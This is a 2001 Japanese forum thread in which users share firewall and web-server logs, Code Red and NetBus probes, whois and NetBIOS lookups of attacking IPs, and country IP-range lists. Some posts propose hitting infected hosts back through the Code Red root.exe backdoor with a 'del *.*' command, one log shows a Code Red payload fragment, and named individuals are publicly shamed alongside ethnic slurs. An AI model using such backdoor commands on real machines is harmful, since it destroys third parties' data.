PING打ってくるから何かと思ってhttpdのログ見てみたら
CodeRedも打ってきてたた。　逝ってよし

不正アクセスをブロックしましたって表示が頻繁に出る
うんざり。迷惑メールよりひどい
まあ非表示にすりゃいいんだろうけどさ

IP: 210.170.23.233
DNS: whisky.hq.icc.ne.jp

つうか、ここうちが加入しているプロバイダの本社
（HeadQuarter）らしいんだけど。(藁

丸紅系インタラクティブケーブルコミュニケーショ
ンズ逝ってよし。

http://www.traffimagic.com/WIP15MMKOCA/B000057/comein/WIP

http://www.traffimagic.com/WIP15MMKOPA/B000017/comein/WJF

http://www.traffimagic.com/WIP15MMKOQA/B000022/comein/WJH

http://www.traffimagic.com/WIP15MMKOSA/B000057/comein/WJT

http://www.traffimagic.com/WIP15MMKOCA/B000013/comein/WJF

http://www.traffimagic.com/WIP15MMKOPA/B000018/comein/WJH

210.221.132.131

210.112.236.132

210.85.116.141

210.222.201.182

210.222.17.242

210.201.13.102

210.207.78.236
210.136.196.12
210.231.124.94
210.231.48.45
210.79.241.133
210.94.42.187
210.109.226.159
210.231.124.94
210.67.169.249
210.231.48.45
210.231.124.94
210.181.85.2
210.180.242.236
210.77.142.131

210.202.191.52
210.94.171.190
210.105.239.55

61.32.*.*-61.55.*.*
61.72.*.*-61.111.*.*
61.248.*.*-61.255.*.*
202.6.95.*
202.14.103.*
202.14.165.*
202.20.82.*-202.20.86.*
202.20.99.*
202.20.119.*
202.20.128.*-202.20.255.*
202.21.0.*-202.21.7.*
202.30.*.*-202.31.*.*
203.224.*.*-203.255.*.*
210.90.*.*-210.127.*.*
210.178.*.*-210.183.*.*
210.204.*.*-210.207.*.*
210.216.*.*-210.223.*.*
211.32.*.*-211.63.*.*
211.104.*.*-211.119.*.*
211.168.*.*-211.255.*.*

韓国のIPたち。わりとコンパクトだな。

61.28.*.*-61.29.*.*
61.128.*.*-61.191.*.*
61.232.*.*-61.237.*.*
202.0.110.*
202.0.160.*-202.0.179.*
202.4.128.*-202.4.159.*
202.4.252.*-202.4.255.*
202.14.88.*
202.14.235.*-202.14.238.*
202.20.120.*
202.22.248.*-202.22.255.*
202.38.0.*-202.38.15.*
202.38.32.*-202.38.63.*
202.38.64.*-202.38.255.*
202.90.0.*-202.90.3.*
202.90.252.*-202.90.255.*
202.91.0.*-202.91.3.*
202.91.128.*-202.91.131.*
202.92.0.*-202.92.3.*
202.92.252.*-202.92.255.*
202.93.0.*-202.93.3.*
202.93.252.*-202.93.255.*
202.94.0.*-202.94.31.*
202.95.0.*-202.95.31.*
202.95.252.*-202.95.255.*
202.96.*.*-202.111.*.*
202.112.*.*-202.121.*.*
202.122.0.*-202.122.39.*
202.122.128.*
202.127.0.*-202.127.63.*
202.127.128.*-202.127.255.*
202.130.0.*-202.130.31.*
202.130.224.*-202.130.255.*
202.131.160.*-202.131.223.*
202.136.252.*-202.136.255.*
202.192.*.*-202.207.*.*

中国のIPたち。続く…

203.87.224.*-203.87.255.*
203.88.0.*-203.88.63.*
203.89.0.*-203.89.63.*
203.90.0.*-203.90.63.*
203.91.0.*-203.91.63.*
203.92.0.*-203.92.63.*
203.93.*.*
203.94.0.*-203.94.63.*
203.95.0.*-203.95.63.*
203.128.128.*-203.128.159.*
203.184.0.*-203.184.31.*
203.192.0.*-203.192.31.*
203.196.0.*-203.196.63.*
203.206.*.*
203.207.64.*-203.207.127.*
203.207.128.*-203.207.255.*
203.208.0.*-203.208.63.*
203.212.0.*-203.212.63.*
203.223.0.*-203.223.15.*
210.5.*.*
210.6.*.*
210.12.*.*
210.14.128.*-210.14.255.*
210.15.0.*-210.15.127.*
210.21.*.*-210.22.*.*
210.25.*.*-210.47.*.*
210.51.*.*-210.53.*.*
210.72.*.*-210.79.*.*
210.82.*.*-210.83.*.*
211.64.*.*-211.71.*.*
211.80.*.*-211.95.*.*
211.96.*.*-211.103.*.*
211.136.*.*-211.143.*.*
211.144.*.*-211.159.*.*
211.160.*.*-211.167.*.*

中国のIPその２。多すぎ。さすが人口１２億。

594さんの情報によれば...
((韓国))
210.113.203.26
210.119.229.164
210.123.193.47
210.125.186.41
210.125.169.234
211.33.79.50
((その他))
210.231.41.138
210.234.34.55
213.255.28.112
ですか？20〜30回/時きてます。
いったい何がしたいんじゃろ？ヒマな連中もいるもんだなぁ。

あら、こんなのあったんだ。俺も来たらやろ〜っと(≧▽≦)

f2-147.dokidoki.ne.jp

>597
いまさらCode RedのアクセスのIPを採取している方がよっぽど暇だと思うよ。
韓国は感染数世界一だから来るのが多くて当然（NT,2000のライセンス数より
多いんじゃないか？W）。
バックドアをつつく気が無ければhttpはXXXX...やNNNN...が見えた時点で無視。

>>600

はっ!!

そうか!!

WinNT/2000 不正コピー企業を探るための MS の罠か!!!

IP: 61.117.118.213
DNS: M118213.ppp.dion.ne.jp
Node: KAGAWA
Group: 自宅
NetBIOS: 自宅 
MAC: 444553547777

IP: 61.126.136.106
Node: TONTON-2KQWSKZV
Group: WORKGROUP
NetBIOS: WORKGROUP 
MAC: 444553547777
DNS: p3106-flets-adsl01maru.tokyo.ocn.ne.jp

IP: 211.174.108.16
Node: SEXMAN22
Group: WORKGROUP
NetBIOS: SEXMAN22 j
MAC: 5254AB30C9E0

IP: 211.240.26.131
NetBIOS: IS~<B1>霤ｵ<B1>ﾔ
Node: <B1>霤ｵ<B1>ﾔ
Group: MINETDEV.CO.KR
MAC: 0050BF04CB94
DNS: ｱ霤ｵｱﾔ

IP: 211.116.238.166
Node: ﾀﾌ<B1>貶｣
Group: WORKGROUP
NetBIOS: IS~ﾀﾌ<B1>貶｣
MAC: 00902712903C

IP: 61.33.242.221
Node: FLYMETOTHEMOON
Group: NIPSE
NetBIOS: IS~LYMETOTHEMOON
MAC: 000102621FA6

IP: 211.180.150.104
Node: MANAGER
Group: ﾇ�ｼｺﾀ?ﾀﾚ
NetBIOS: IS~MANAGER
MAC: 00104B7A03EE
DNS: MANAGER

ＩＰアドレス 211.123.26.17 がしつこいので調べてやった。
「石川 泰久」ちゅうのはどこの馬鹿だ？

--------------------------------------------------------------------------------
211.123.26.16-211.123.26.31の調査結果 (jpnic)
--------------------------------------------------------------------------------
[whois.nic.ad.jp]
[ JPNIC database provides information on network administration. Its use is ]
[ restricted to network administration purposes. For further information, use ]
[ 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, add '/e' at ]
[ the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.123.26.16/28
b. [ネットワーク名] V-MONKEYS
f. [組織名] 石川 泰久
g. [Organization] Ishikawa,Yasuhisa
m. [運用責任者] YI2845JP
n. [技術連絡担当者] YI2845JP
y. [通知アドレス]
[割当年月日] 2000/08/15
[返却年月日]
[最終更新] 2000/08/15 11:52:03 (JST)
[email protected]

--------------------------------------------------------------------------------

IP: 61.207.63.186
Node: OPS3-COMPAQ-OLD
Group: OPS
MAC: 444553547777
DNS: p2186-ipad01funabasi.chiba.ocn.ne.jp

IP: 61.207.134.158
Node: EPSON
Group: WORKGROUP
NetBIOS: ADMINISTRATOR
MAC: 005345000000
DNS: p2158-ip01yosida.nagano.ocn.ne.jp

inetnum: 211.216.0.0 - 211.225.255.255
netname: KORNET
descr: KOREA TELECOM
descr: KOREA TELECOM Internet Operating Center
country: KR
admin-c: DL276-AP
tech-c: WK81-AP
remarks: ******************************************
remarks: Allocated to KRNIC Member.
remarks: If you would like to find assignment
remarks: information in detail please refer to
remarks: the KRNIC Whois Database at:
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed: [email protected] 20000901
changed: [email protected] 20000912
changed: [email protected] 20010627
source: APNIC

person: Dongjoo Lee
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: DL276-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010523
source: APNIC

person: Won Kang
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: WK81-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010523
source: APNIC

韓国の馬鹿からトロイの木馬攻撃を受けました。
氏ね。

The firewall has blocked Internet access to your computer
(HTTP) from 211.104.245.3 (TCP Port 2309).
Time: 01/08/11 12:25:58

今日はブラジルからのお客様です

IP: 200.207.131.206
DNS: 200-207-131-206.dsl.telesp.net.br

[email protected]

IP: 61.217.194.217
DNS: 61-217-194-217.HINET-IP.hinet.net
Node: ｾGｬfｭｳ
Group: MSHOME
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 444553547777

これって糞韓国？

台湾

211.10.26.123

ケーブル・アンド・ワイヤレス・アイディーシー株式会社 (Cable & Wireless IDC Inc.)
SUBA-113-26 [サブアロケーション] 211.10.26.0
株式会社アドコア (ADCORE K.K.)
ADCOREJAPAN [211.10.26.120 <-> 211.10.26.127] 211.10.26.120/29

>600
おまえはCodeRedだとなぜわかる知ったかクン(わら

REMOTE_HOST / L035245.ppp.dion.ne.jp
REMOTE_ADDR / 211.126.35.245
HTTP_USER_AGENT / Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)

Domain Information: [ドメイン情報]
a. [ドメイン名] DION.NE.JP
b. [ねっとわーくさーびすめい] でぃおん
c. [ネットワークサービス名] DION
d. [Network Service Name] DION
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] KT6191JP
n. [技術連絡担当者] KW062JP
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns1.dion.ne.jp
y. [通知アドレス] [email protected]
[状態] Connected (2002/03/31)
[登録年月日] 1997/05/02
[接続年月日] 1997/06/19
[最終更新] 2001/02/21 12:07:55 (JST)
[email protected]

IANA (IANA-CBLK-RESERVED)
Internet Assigned Numbers Authority
4676 Admiralty Way, Suite 330
Marina del Rey, CA 90292-6695
US

Netname: IANA-CBLK1
Netblock: 192.168.0.0 - 192.168.255.255

Coordinator:
Internet Corporation for Assigned Names and Numbers (IANA-ARIN) [email protected]
(310) 823-9358

Domain System inverse mapping provided by:

BLACKHOLE.ISI.EDU 128.9.64.26
BLACKHOLE.EP.NET 198.32.1.116

These blocks are reserved for special purposes.
Please see RFC 1918 for additional information.

Record last updated on 16-May-2001.
Database last updated on 10-Aug-2001 23:05:56 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

>>618の場合はどの部分を見れば相手の国名等が分かるの？

また、自分のゾヌのログだと

PE,2001/08/11,23:00:44 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:44 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:44 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:44 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:45 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:45 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:45 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:45 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:45 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:46 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:46 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:46 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:46 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:46 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:46 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:46 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:47 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:00:47 +9:00 GMT,TSAdBot,216.35.217.210:0,N/A
PE,2001/08/11,23:02:46 +9:00 GMT,KATJUSHA.EXE,192.168.1.1:53,N/A
PE,2001/08/11,23:20:19 +9:00 GMT,HOTZN010.EXE,192.168.1.1:53,N/A
PE,2001/08/11,23:32:37 +9:00 GMT,2ch Browser,192.168.1.1:53,N/A
PE,2001/08/12,00:24:20 +9:00 GMT,Distributed COM Services,0.0.0.0:0,N/A
PE,2001/08/12,00:24:21 +9:00 GMT,Distributed COM Services,0.0.0.0:0,N/A
PE,2001/08/12,00:24:33 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:33 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:33 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:34 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:34 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:34 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:34 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:34 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:34 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:34 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:35 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:35 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:35 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:35 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:35 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:36 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:36 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A
PE,2001/08/12,00:24:37 +9:00 GMT,TSAdBot,192.168.1.1:0,N/A

ってな感じなんだけど、これってヤバイ？

>>619
PEって…。ログの見方ぐらい勉強しろよ。

そろそろRPCの定期便が再開し始めているな。

210.125.152.40
KIMSEUNGDONG
00-50-BF-5F-4D-1C

>>620
ｽﾏｿ

ログの見方を勉強できるサイトないですかね〜？

211.124.169.77
[組織名] 北摂ケーブルネット株式会社

しつこい

送り返してあげようよ(^^ゞ
http://IpAddress/c/inetpub/scripts/root.exe?/c+del+*.*

っとその前にdirを確認してからね・・・
http://IpAddress/c/inetpub/scripts/root.exe?/c+dir

でもhttpからのリクエストだと権限がないエラーですが、
どうしたらいいですか？

http://IpAddress/c/inetpub/scripts/root.exe?/c+dir
で片っ端からアタックしてきたＩＰいれてdirみえた奴はオダブツさんってことじゃないでしょうか。

そういうのはさっさとウイルスごとお掃除してしまいましょう。

あ、そういえば、赤い暗号の裏木戸って感染したあと持ち主が管理者
権限でいっかいログインしないと有効にならないだよね・・・
参考まで。

インターネット端末機無料レンタ
ル遂に開始!!!!!! 詳しい内容はこちらです。

http://cym10262.omosiro.com/

The firewall has blocked Internet access to your computer (ICMP Unreachable)
from 207.46.224.131.

Occurred: 18 times between 01/08/12 1:14:04 and 01/08/12 1:54:58
Occurred: 28 times between 01/08/12 2:14:52 and 01/08/12 3:10:24
Occurred: 66 times between 01/08/12 2:48:20 and 01/08/12 3:00:58
Occurred: 38 times between 01/08/12 21:42:44 and 01/08/12 21:47:04

ここ数日、しつこいくらいに打ってくるんですけど、このアドレスは、何のものなのでしょうか？
ダイアルアップ接続のアドレスじゃないみたいだし、社員のものでもないようだし、
何をしようとしてるのかな？

kasrgs001.ac.kddnet.ad.jp
Domain Information:
a. [Domain Name] KDDNET.AD.JP
g. [Organization] DDI CORPORATION
l. [Organization Type] COMPANY
m. [Administrative Contact] KT6156JP
n. [Technical Contact] MK2322JP

なんかルータの名前みたいだね。

ルータが感染してました(爆藁
どうりで遅いと思った。

おっとスレ違い。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.206.96.0-61.206.103.0
b. [ネットワーク名] MNI-ISP-0001
f. [組織名] 宮城ネットワーク株式会社
g. [Organization] Miyagi Network Inc.
m. [運用責任者] RS215JP
n. [技術連絡担当者] SF210JP
p. [ネームサーバ] ns0.mni.ne.jp
p. [ネームサーバ] ns1.mni.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/05/18
[返却年月日]
[最終更新] 2001/06/12 13:06:09 (JST)
[email protected]

先ほど引っかかりました。
どうしたらこいつらギャフンって言わせられますかねぇ・・・

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.207.0.0-61.207.255.0
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [運用責任者] SY615JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] YK526JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] TA221JP
p. [ネームサーバ] ns-os001.ocn.ad.jp
p. [ネームサーバ] pns.ocn.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/05/08
[返却年月日]
[最終更新] 2001/05/08 11:52:02 (JST)
[email protected]

あらら・・・

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.203.0.0-61.203.127.0
b. [ネットワーク名] BIGLOBE-2
f. [組織名] BIGLOBEサービス(日本電気株式会社)
g. [Organization] NEC Corporation
m. [運用責任者] TN265JP
n. [技術連絡担当者] NK032JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/03/22
[返却年月日]
[最終更新] 2001/06/21 16:13:00 (JST)
[email protected]

先ほどからしつこい・・・

who is　ってほんとーに何度みてもいいですねぇ〜

IP: 211.6.251.146
DNS: takonet.ikazaki.ne.jp

オープンコンピュータネットワーク (Open Computer Network)
SUBA-131-M59 [サブアロケーション] 211.6.251.0
いかざき凧ネットワーク (久保 和繁) (Ikazaki Tako Network (kubo,Kazushige))
IKAZAKI-TAKO [211.6.251.144 <-> 211.6.251.159] 211.6.251.144/28

IP: 211.111.221.74
Node: <C7>ﾑｼ<F6>
Group: JCMBA
NetBIOS: IS~<C7>ﾑｼ<F6>
MAC: 00804888B099
DNS: ﾇﾑｼ・

IP: 211.108.76.94
Node: ｹﾚｰ｡ﾈｯ
NetBIOS:
__MSBROWSE__

Group: WORKGROUP
MAC: 0001029A0A3B
DNS: ｹﾚｰ｡ﾈｯ

ほれ餌じゃ
telnet www.sansei-s.co.jp 11

今トロイの木馬Busで攻撃して来たﾔﾂ！
211.211.238.45

自分のプロバイダのアクセスは不正じゃないと思ってたんだけど
違うの？常に200〜300のＩＰログにあるよ。
不正アクセスはぞぬのポップアップが真っ赤な時？
誰か教えて！

>>643
俺もおなじびびったよ。これなんじゃい？

６４３です
>>645
同じですか！さっきノートンのアイコンが点滅したので
見てみたら、このＩＰでした。
まさか一斉にやられてるのかな？

>>646
NetBus port prode
心配する必要なし。トロイが入ってないってことだから。
うちにも来たけど。

騙された・捨てられた・弄ばれた・相手に誠意がない・債権トラブル・不倫疑惑・証拠が欲しい・
電話番号などから住所などの詳細を調べて欲しい・等など
何でも気軽に相談下さい。確実に貴方の悩みや困り事、トラブル等を迅速に解決致します。
i-mode・j-sky対応
http://www.black-893.com

211.99.197.179:2321
211.100.18.246:2313
209.100.189.51:3478
203.168.205.128:3790
203.129.254.21:1425
211.210.0.188:1694
65.11.182.190:4824
203.165.82.144:4082
202.181.239.210:22
203.162.12.181:1650
203.165.179.210:3452
203.234.21.111:2741
203.165.49.33:3289
203.185.98.217:4397
203.27.211.107:1972
203.248.138.213:1440
211.172.36.152:4943
203.165.49.33:3484
203.165.49.33:3701
61.74.156.5:21
203.67.165.125:50215
203.191.33.21:2765
203.246.94.89:4947
203.193.1.227:4802
203.251.56.203:3217
203.107.146.68:1411
203.104.196.99:2486
203.241.201.225:2195
203.104.196.60:1488
203.165.49.33:3000
203.104.196.60:2682
203.165.179.210:4486
172.173.138.157:2044
203.234.18.64:2912
203.234.20.85:3050
203.129.242.12:1978
203.228.200.132:2930
203.165.179.210:3474
203.165.179.210:4182

(ICMP Unreachable) from 206.176.106.209.

ton.2ch.net (64.71.133.114) (TCP Port 1123) [TCP Flags: S]

>>643
俺も
Time: 01/08/13 0:38:10

あなたが検索されたIPアドレス［ 211.172.36.152 ］の企業名・団体名は以下の通りです。

Asia Pacific Network Information Center (NETBLK-APNIC-CIDR-BLK)
These addresses have been further assigned to Asia-Pacific users.
Contact info can be found in the APNIC database,
at WHOIS.APNIC.NET or http://www.apnic.net/
Please do not send spam complaints to APNIC.
AU

Netname: APNIC-CIDR-BLK2
Netblock: 210.0.0.0 - 211.255.255.255

Coordinator:
Administrator, System (SA90-ARIN) [No mailbox]
+61-7-3367-0490

Domain System inverse mapping provided by:

NS.APNIC.NET 203.37.255.97
SVC00.APNIC.NET 202.12.28.131
NS.TELSTRA.NET 203.50.0.137
NS.RIPE.NET 193.0.0.193

Regional Internet Registry for the Asia-Pacific Region.

*** Use whois -h whois.apnic.net***

*** or see http://www.apnic.net/db/ for database assistance ***


Record last updated on 03-May-2000.
Database last updated on 11-Aug-2001 23:03:50 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

default.ida無しのXだけが連続で20発程来ました、なんでしょう？

210.95.94.131 - - [13/Aug/2001:04:34:00 +0900] "XXXXXXXXXXXXXXXX
中略〜XXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 - "-" "-"

DOCUMENT_ROOT = /home/hokkaido/public_html
ERROR_NOTES = Premature end of script headers: /home/hokkaido/public_html/test/read.cgi
HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_ENCODING = gzip, deflate
HTTP_ACCEPT_LANGUAGE = ja
HTTP_CONNECTION = Keep-Alive
HTTP_HOST = saki.2ch.net
HTTP_REFERER = http://saki.2ch.net/geino/index2.html
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
PATH = /usr/local/bin:/usr/bin:/bin:.
QUERY_STRING REMOTE_ADDR = 秘密
REMOTE_PORT = 1081
REQUEST_METHOD = GET
SCRIPT_FILENAME = /home/hokkaido/public_html/test/read.cgi
SERVER_ADMIN = [email protected]
SERVER_NAME = saki.2ch.net
SERVER_PORT = 80
SERVER_SOFTWARE = Apache/1.3.6 (Unix) PHP/4.0.3pl1 mod_ssl/2.3.6 OpenSSL/0.9.3a
STATUS = 500
URL = /test/read.cgi

>>653
激しくｶﾞｲｼｭﾂです。Code Red スレに逝ってください。

inetnum: 61.139.128.0 - 61.139.191.255
netname: CHINANET-JL
descr: CHINANET Jilin province network
descr: Data Communication Division
descr: China Telecom

メール開いた途端にシナからのアクセスって・・・？
country: CN
admin-c: CH93-AP
tech-c: XY1-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-JL
changed: [email protected] 20010120
source: APNIC

person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC

person: Xu Yongzhong
address: Data Communication Bireau
address: Ministry of Posts and Telecommunications
address: A12 Xin-jie-kou-wai Street
address: Beijing 100088
country: CN
phone: +86-10-62053991
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: XY1-AP
mnt-by: MAINT-NULL
changed: [email protected] 19960319
source: APNIC

>655 名前：名無しさん＠お腹いっぱい。 投稿日：2001/08/13(月) 06:22
>>653
>激しくｶﾞｲｼｭﾂです。Code Red スレに逝ってください。

探しました。ありません、（藁
おしえてくれよ〜・

晒しもの：建設省関東地方建設局 下館工事事務所
本サイトはwww.moc.go.jp Apacheです。
www.shimodate.kt.moc.go.jp　先般からウザイ。電話で連絡するも
(おねぇいちゃんでるぞ)担当者がぁ〜いま〜とノタマウので話にならない。
相変わらずだし、OCNのサブでOCNにも言ったのに。
go.jpで晒しためらっていたが、もうキレた。今日は10発きた

213.68.230.21
telnetでつないじゃった。
コードレッド・・・今日は213.x.x.xが多い。

つーかウザイYO！>>653

>>659
ウザイ言う前におしえてよ。
だから、なんなのよ。消えるからさぁ・。

gyaon gyaon

あなたが検索されたアドレス［ 210.230.9.154 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.230.6.0-210.230.21.0
b. [ネットワーク名] ALPHATEC
f. [組織名] アルファテック インターネットサービス
(株式会社パルテック)
g. [Organization] Alphatec Internet Service.(Paltec,Inc)
m. [運用責任者] MY223JP
n. [技術連絡担当者] MY223JP
n. [技術連絡担当者] RY114JP
p. [ネームサーバ] ns1.alphatec.or.jp
p. [ネームサーバ] ns1.15.alphatec.or.jp
p. [ネームサーバ] ns1.18.alphatec.or.jp
p. [ネームサーバ] ns1.08.alphatec.or.jp
p. [ネームサーバ] ns2.neweb.ne.jp
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 1998/07/15
[返却年月日]
[最終更新] 2000/08/09 19:33:18 (JST)
[email protected]

こいつもウザすぎ！毎日来やがる.....ま、コードレッドだけど。

from 210.155.159.7

from 210.155.159.71

最近多いよねぇ・・・コードレッド

プロバイダー晒してどうする、って気もする。

すいません。質問です。
常時接続固定IPでファイヤーウォールにZONEALARM使ってます。
毎日数十件〜百数十の警告ログが増えます。
その大半のIPが202.***.***.***（*は不定）といったアドレスからのものです。
一回調べたことがあり、その時は韓国の大企業（日本でも有名）のネットだとわかりました。
IPの最初の部分って国別に与えられているんですよね？。
って事は韓国のイロイロなPCを経由して私のFWが反応するような通信を受けたと言うことなのでしょうか？。
やたらに多いので心配になります。
ZONEALARMでどのようなログが出たら危ない攻撃といえるのか、教えていただけませんでしょうか？。
まじレスお願いします。

すげ〜怪しい会社。。。。210.175.97.34
ここのTI125JPは、、、、一体何者？？

a. [IPネットワークアドレス] 210.175.96.0-210.175.97.0
b. [ネットワーク名] MANDALANET
f. [組織名] 有限会社であいネット
g. [Organization] DEAINET INC
m. [運用責任者] TT158JP
n. [技術連絡担当者] TI125JP
n. [技術連絡担当者] TT158JP
p. [ネームサーバ] ns.mandala.ne.jp
p. [ネームサーバ] dns2.odn.ne.jp
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 1997/10/15

>>667
書く前に読め。これが貴方に送る言葉です。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742&ls=50

203.249.74.36:1638
203.234.21.205:1040
203.232.107.179:3302
203.45.222.64:1642
203.192.197.68:3634
203.246.109.116:3322
203.239.42.51:3708
203.165.59.48:1739

だからよぉ、ネットヲタばっかじゃねぇんだよ。
専門用語並べていきがってんなよ。
聞いてることに答えられないから全部コードレッドがよ（藁
ちゃんと答えたれや！

分かりました。説明させていただきます。
危険なのはZoneAlarmがなんの反応もしないときです。

あなたが検索されたIPアドレス［ 203.126.127.190 ］の企業名・団体名は以下の通りです。

Asia Pacific Network Information Center (APNIC2)
These addresses have been further assigned to Asia-Pacific users.
Contact info can be found in the APNIC database,
at WHOIS.APNIC.NET or http://www.apnic.net/
Please do not send spam complaints to APNIC.
AU

Netname: APNIC-CIDR-BLK
Netblock: 202.0.0.0 - 203.255.255.255
Maintainer: AP

Coordinator:
Administrator, System (SA90-ARIN) [No mailbox]
+61-7-3367-0490

Domain System inverse mapping provided by:

SVC00.APNIC.NET 202.12.28.131
NS.APNIC.NET 203.37.255.97
NS.TELSTRA.NET 203.50.0.137
NS.RIPE.NET 193.0.0.193

Regional Internet Registry for the Asia-Pacific Region.

*** Use whois -h whois.apnic.net***
*** or see http://www.apnic.net/db/ for database assistance ***


Record last updated on 18-Jun-1999.
Database last updated on 11-Aug-2001 23:03:50 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

210.110.88.76
↑ルータのログより見つけました。
んで、アクセスしてみて初めてNortonが反応した！
怖くなって即回線切って完全スキャンしたけど何にもでした。
どういうこと？

>>673
APNICを晒してどうする...

つーかちょっとした用語もわからないのであれば初心者ネットでも逝って下さい。
ヴァカに説明することほど面倒なことはない。

だから織れはdefault.idaのねぇ、Xだけってのが一杯来てるが
なんなんだよ〜と聞いてもガイシュツぬかすやんけ〜、どこあんだ〜ア〜ン？
知らぬなら、しらんいわんかい！
壊れかけのCodeREDなのですか？　教えてん。プリプリ。

単に表示されないだけかもね。default.ida

がいしゅつなのは知ってて言ってるんだよね？

inetnum: 61.140.0.0 - 61.143.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
